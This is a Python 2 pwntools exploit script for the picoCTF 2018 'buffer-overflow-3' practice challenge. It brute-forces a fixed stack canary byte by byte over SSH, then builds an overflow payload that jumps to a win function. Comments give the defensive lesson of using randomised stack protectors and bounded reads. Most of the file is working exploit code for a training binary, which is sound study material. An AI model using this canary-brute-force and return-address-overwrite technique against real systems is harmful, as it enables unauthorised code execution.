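# Python 2 / pwntools script for the picoCTF 2018 "buffer-overflow-3" practice
# problem. It recovers the 4-byte stack canary one byte at a time, then prints
# the complete input for the overflow.
#
# Why the byte-at-a-time search works: every guess below runs in a fresh
# ./vuln process, so the loop only succeeds if the canary has the same value
# on every launch. A canary drawn at random per process (what compiler stack
# protectors do) would invalidate each confirmed byte on the next launch.
# The defensive takeaway is to use the compiler's stack protector rather than
# a fixed canary, and to bound the read to the size of the buffer.
from pwn import *
import sys

# context.log_level = 'debug'

# Address of win as raw little-endian bytes (0x080486eb).
win = '\xeb\x86\x04\x08'

# Input layout, 56 bytes in total:
#   32 filler bytes + canary (4 bytes) + 12 bytes to fill the remaining space
#   under ebp + 4 bytes to fill ebp + win address
firstPart = 'A' * 32
middlePart = 'A' * 16
canary = ''

# NOTE: credentials are taken from argv, so the password is visible in the
# local process list and is saved in shell history.
remoteShell = ssh(host = '2018shell1.picoctf.com', user=sys.argv[1], password=sys.argv[2])
remoteShell.set_working_directory('/problems/buffer-overflow-3_3_6bcc2aa22b2b7a4a7e3ca6b2e1194faf')

for i in range(0, 4):
    for j in range(256):
        # Start the binary through the SSH session opened above; the script
        # previously used the name `s` here, which is never defined.
        p = remoteShell.process('./vuln')
        try:
            # Announce a length that reaches exactly one byte past the part
            # of the canary already recovered.
            p.sendlineafter('>', str(i + 32 + 1))
            p.sendafter('>', firstPart + canary + chr(j))
            response = p.recvall()
        finally:
            # Close the process even when the exchange raises, so an aborted
            # attempt does not leave ./vuln running on the shared host.
            p.close()
        # No 'Stack Smashing' message means byte i matched the stored canary.
        if 'Stack Smashing' not in response:
            canary += chr(j)
            break
    else:
        # Without this, a byte that never matches would silently leave the
        # canary short and the printed input would be wrong.
        raise RuntimeError('no value accepted for canary byte %d' % i)

remoteShell.close()

# Parenthesised so the line behaves the same as the Python 2 print statement.
print(firstPart + canary + middlePart + win)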